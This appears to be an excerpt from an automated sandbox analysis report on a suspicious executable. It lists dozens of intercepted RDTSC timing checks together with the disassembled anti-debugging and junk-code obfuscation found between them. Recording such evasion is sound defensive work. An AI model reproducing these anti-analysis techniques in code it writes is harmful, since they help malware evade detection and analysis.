                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103BB second address: 141042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F98450EE8CFh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F98450EE8D9h 0x00000016 nop 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov eax, esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D1D01h] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F98450EE8C8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 cmc 0x00000043 mov dword ptr [ebp+122D1D71h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007F98450EE8C8h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410E28 second address: 1410E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122E1 second address: 14122E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122E7 second address: 14122EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14122EC second address: 1412369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F98450EE8C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F98450EE8C8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2191h], esi 0x00000049 add dword ptr [ebp+122D1BB2h], edx 0x0000004f xchg eax, ebx 0x00000050 push ecx 0x00000051 jmp 00007F98450EE8CEh 0x00000056 pop ecx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F98450EE8CEh 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412369 second address: 1412373 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9844BC1D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412E37 second address: 1412E4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jns 00007F98450EE8C6h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412E4E second address: 1412E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412E54 second address: 1412E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14120AB second address: 14120B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1418ED7 second address: 1418EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1418F88 second address: 1418F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419E40 second address: 1419E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419E44 second address: 1419E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9844BC1D64h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AF51 second address: 141AF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BEB1 second address: 141BEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BEB6 second address: 141BF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F98450EE8C8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D29DBh] 0x0000002f call 00007F98450EE8D8h 0x00000034 mov dword ptr [ebp+122D1842h], edx 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e jmp 00007F98450EE8D7h 0x00000043 mov edx, dword ptr [ebp+122D2C91h] 0x00000049 popad 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+1245E949h], ebx 0x00000052 push eax 0x00000053 pushad 0x00000054 jc 00007F98450EE8CCh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE2D second address: 141CE33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE33 second address: 141CE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CE3A second address: 141CEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9844BC1D58h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F9844BC1D58h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 jc 00007F9844BC1D5Ch 0x00000046 or ebx, dword ptr [ebp+122D2C8Dh] 0x0000004c push 00000000h 0x0000004e jmp 00007F9844BC1D5Eh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jp 00007F9844BC1D56h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DDCE second address: 141DDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141618D second address: 1416191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419FC6 second address: 1419FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419FCB second address: 141A03B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F9844BC1D56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9844BC1D61h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F9844BC1D58h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov bh, cl 0x00000031 push dword ptr fs:[00000000h] 0x00000038 movzx ebx, cx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 and bl, FFFFFFFEh 0x00000045 mov eax, dword ptr [ebp+122D0A51h] 0x0000004b clc 0x0000004c push FFFFFFFFh 0x0000004e mov dword ptr [ebp+122D2239h], edi 0x00000054 nop 0x00000055 push ecx 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B1E3 second address: 141B1EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B1EA second address: 141B1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007F9844BC1D6Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C045 second address: 141C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B1FC second address: 141B200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C04A second address: 141C07C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F98450EE8D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C07C second address: 141C10A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov bl, D7h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bx, di 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F9844BC1D58h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+1244DFE0h], esi 0x0000003b mov eax, dword ptr [ebp+122D12B5h] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007F9844BC1D58h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000019h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b push FFFFFFFFh 0x0000005d jnc 00007F9844BC1D61h 0x00000063 nop 0x00000064 jnp 00007F9844BC1D60h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141D04F second address: 141D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98450EE8CAh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F98450EE8CCh 0x00000011 nop 0x00000012 mov di, 8858h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d je 00007F98450EE8C9h 0x00000023 mov di, cx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d xor ebx, 77B53347h 0x00000033 jg 00007F98450EE8C9h 0x00000039 mov eax, dword ptr [ebp+122D00F9h] 0x0000003f movzx edi, si 0x00000042 push FFFFFFFFh 0x00000044 mov edi, 6128A2D8h 0x00000049 jne 00007F98450EE8C7h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 jmp 00007F98450EE8CEh 0x00000058 pop ecx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C10A second address: 141C10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C10E second address: 141C112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420EB3 second address: 1420EC5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F9844BC1D5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422FFB second address: 1423008 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423008 second address: 142300E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142300E second address: 1423042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F98450EE8D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F98450EE8D4h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142514E second address: 1425152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1425152 second address: 1425158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1425158 second address: 142515E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142515E second address: 142518D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jne 00007F98450EE8C6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F98450EE8C6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142518D second address: 14251FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F9844BC1D58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx edi, si 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F9844BC1D58h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 push 00000000h 0x00000047 pushad 0x00000048 xor si, 6E66h 0x0000004d mov eax, dword ptr [ebp+1244DBD7h] 0x00000053 popad 0x00000054 xchg eax, esi 0x00000055 jl 00007F9844BC1D60h 0x0000005b pushad 0x0000005c push edi 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DEE1 second address: 141DF94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c je 00007F98450EE8CCh 0x00000012 sub dword ptr [ebp+122D1D09h], edx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F98450EE8C8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 call 00007F98450EE8D7h 0x00000045 jmp 00007F98450EE8D5h 0x0000004a pop ebx 0x0000004b mov eax, dword ptr [ebp+122D01DDh] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007F98450EE8C8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000015h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov dword ptr [ebp+122DB647h], edi 0x00000071 push FFFFFFFFh 0x00000073 and bx, 689Dh 0x00000078 or bl, 00000012h 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141DF94 second address: 141DF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9844BC1D56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141EFF3 second address: 141F004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 js 00007F98450EE8D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14231DC second address: 14231E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14231E2 second address: 1423205 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F98450EE8D6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423205 second address: 1423209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423209 second address: 1423213 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142545A second address: 142547A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jg 00007F9844BC1D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142547A second address: 142547E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142E310 second address: 142E361 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9844BC1D6Fh 0x00000008 jno 00007F9844BC1D5Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9844BC1D5Bh 0x00000017 push esi 0x00000018 jmp 00007F9844BC1D63h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142E361 second address: 142E366 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142E366 second address: 142E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142DA8E second address: 142DACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F98450EE8CEh 0x0000000b pushad 0x0000000c je 00007F98450EE8E3h 0x00000012 jmp 00007F98450EE8D0h 0x00000017 jmp 00007F98450EE8CDh 0x0000001c jng 00007F98450EE8CCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142DACD second address: 142DAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9844BC1D5Ch 0x0000000a jo 00007F9844BC1D56h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142DD6F second address: 142DD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142DD73 second address: 142DD94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F9844BC1D64h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14334C1 second address: 14334C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14334C7 second address: 14334CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14379F1 second address: 14379F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14379F7 second address: 1437A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9844BC1D66h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437A17 second address: 1437A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437A2D second address: 1437A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437E76 second address: 1437E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437E7B second address: 1437E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9844BC1D56h 0x00000009 ja 00007F9844BC1D56h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F9844BC1D5Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437E9C second address: 1437EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143C27F second address: 143C285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144160A second address: 144160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144160F second address: 144161D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9844BC1D58h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141436D second address: 1414371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414371 second address: 1414375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414375 second address: 141437B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141437B second address: 14143B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9844BC1D64h 0x00000008 jmp 00007F9844BC1D5Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9844BC1D5Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414496 second address: 14144BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F98450EE8CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
